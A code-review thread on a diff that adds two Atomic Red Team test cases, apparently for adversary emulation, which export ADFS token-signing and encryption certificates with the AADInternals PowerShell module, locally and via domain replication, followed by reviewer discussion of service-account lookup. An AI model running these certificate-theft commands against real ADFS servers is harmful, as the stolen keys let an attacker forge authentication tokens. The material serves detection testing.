atomics/T1552.004/T1552.004.yaml

```
@@ -83,4 +83,100 @@ atomic_tests:
     cleanup_command: |
       rm -rf #{output_folder}
     name: sh
-    
\ No newline at end of file
+- name: ADFS signing token certificate theft - Local
+  auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
+  description: |
+    Retrieve ADFS signing token and encrypting token certificates. You must be signed in as Administrator on the ADFS server.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AADInternals module must be installed.
+    prereq_command: |
+      if (Get-Module AADInternals) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module AADInternals -Force
+      Export-AADIntADFSCertificates -verbose
+      Write-Host "Certificates retrieved successfully"
+    cleanup_command: |
+      Remove-Item -Path ".\ADFS_encryption.pfx"
+      Remove-Item -Path ".\ADFS_signing.pfx"
+    name: powershell
+- name: ADFS signing token certificate theft - Remote
+  auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
+  description: |
+    Retrieve ADFS signing token and encrypting token certificates. You must be signed in as Domain Administrator on a domain join computer.
+  supported_platforms:
+  - windows
+  input_arguments:
+    adfs_service_account_name:
+      description: Name of the ADFS service account
+      type: String
+      default: "adfs_svc"
+    replication_user:
+      description: Username with replication rights. It can be the Domain Admin running the script
+      type: String
+      default: "Administrator"
+    replication_password:
+      description: Password of replication_username
+      type: String
+      default: "ReallyStrongPassword"
+    dc_server_name:
+      description: Name of the DC server
+      type: String
+      default: "DC01.contoso.com"
+    adfs_server_name:
+      description: Name of the ADFS server
+      type: String
+      default: "sts.contoso.com"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AADInternals module must be installed.
+    prereq_command: |
+      if (Get-Module AADInternals) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module ActiveDirectory -Force
+      Import-Module AADInternals -Force
+
+      #Get Configuration
+      $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq #{adfs_service_account_name}
```

```suggestion
      $svc = Get-ADUser -identity "#{adfs_service_account_name}" -Properties objectguid,objectsid
```
I didn't test it so please do, but it looks more efficient!

---

The adfs account can be a user with "password never expire" policy or a managed service account. The latter won't be recognise with Get-ADUser.

---

Good catch indeed!